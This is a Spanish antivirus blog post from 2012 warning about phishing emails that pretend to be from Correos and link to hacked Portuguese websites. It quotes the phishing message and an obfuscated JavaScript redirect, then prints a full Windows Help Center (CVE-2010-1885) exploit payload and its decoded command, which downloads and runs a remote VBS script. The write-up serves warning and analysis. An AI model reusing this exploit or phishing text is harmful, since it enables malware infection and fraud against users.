AVALANCHA DE MAILS CON FALSO REMITENTE DE CORREOS QUE SON ENVIADOS MASIVAMENTE A MUCHAS CUENTAS CON DIFERENTE TEXTO Y ENLACE MALICIOSO A DIFERENTES SITES, TODOS ELLOS DE PORTUGAL:
Se estan recibiendo muchos mails con falso remitente de correos, con un link apuntando a servidores hackeados de Portugal, como por ejemplo:
oficinadidactica.pt. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
farmaciadocaramulo.com. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
glamcommunications.com. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
cityalarme.pt. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
mr-associados.com. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
webgeneration.net. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
extremetech.com.pt. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
pedroalves.net. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
servk.com. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
regivete.com. PT Portugal 39.5000 -8.0000 Almouroltec Servicos De Informatica E Internet Lda ALMOUROLTEC – Servicos de Informatica e Internet L
________
El texto es diferente en cada uno, pero basicamente es mas de lo mismo:
——– Mensaje original ——–
Asunto:
Fecha: Thu, 14 Jun 2012 19:49:00 -0300
De: $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:klaps@satinfo.es”>klaps@satinfo.es>, <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:zonavirus@satinfo.es”>zonavirus@satinfo.es>, <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:comercial@satinfo.es”>comercial@satinfo.es>
Estimado cliente,
Ha llegado un paquete postal a su nombre. Es necesario recogerlo en la sucursal más cercana de correos.es.
Para ello imprima el resguardo e indique, en qué sucursal quiere recoger el paquete.
Pulse aquí —-> (ENLACE MALICIOSO en esta caso a http://oficinadidactica.pt/correos.es.html) para imprimir el resguardo y escoger la sucursal.
Estado del paquete: Listo para su entrega
Tipo de servicio: Express
El número de su paquete: ?????????????
Seguro: Sí
Atención! Si usted no retira el paquete durante los proximos 30 días se le cobrará una comisión de 9.95 euros por cada día adícional.
Le pedimos recoger el paquete en menos de 30 días después de recibir este aviso.
Le agradecemos el uso de nuestros servicios,
correos.es
_______________
En cada enlace se ejecuta el siguiente script:
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,110,105,99,101,111,102,102,105,99,101,99,111,109,116,114,105,115,116,97,116,101,46,105,110,102,111,47,100,97,116,97,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,57,55,100,49,57,38,100,61,48,34,44,102,97,108,115,101,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,67,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,120,101)));</script>
vamos a monitorizar dicho script y veremos lo que hace, pero de entrada, como siempre, recomendamos no ejecutar ningun fichero anexado a mails no solicitados, asi como no pulsar en ningun enlace ni imagen de los mismos.
Mientras tanto, cuidado con ellos !!!
saludos
ms, 15-6-2012
ANEXO IMPORTANTE
El script en cuestión ejecuta estos comandos:
cmd /c echo B=”l.vbs”:With CreateObject(“MSXML2.XMLHTTP”):.open “GET”,”http://67.207.198.243/Home/data/hcp_vbs.php?f=16&d=0″,false:.send():Set A = CreateObject(“Scripting.FileSystemObject”):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + “\” + B):D.WriteLine .responseText:End With:D.Close:CreateObject(“WScript.Shell”).Run A.GetSpecialFolder(2) + “\” + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe */
que resultan ser un exploit de la conocida vulnerabilidad CVE-2010-1885, que Microsoft ya solucionó con el parche MS10-042, segun puede verse en :
http://www.microsoft.com/latam/technet/seguridad/boletines/2010/ms10-042.mspx
Especialmente es crítico en los Windows XP SP2, y Windows Server 2003, en los que se supone que se han instalado los parches , y sino, conviene lanzar un windowsupdate y actualizarlos (www.update.microsoft.com)
ms.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.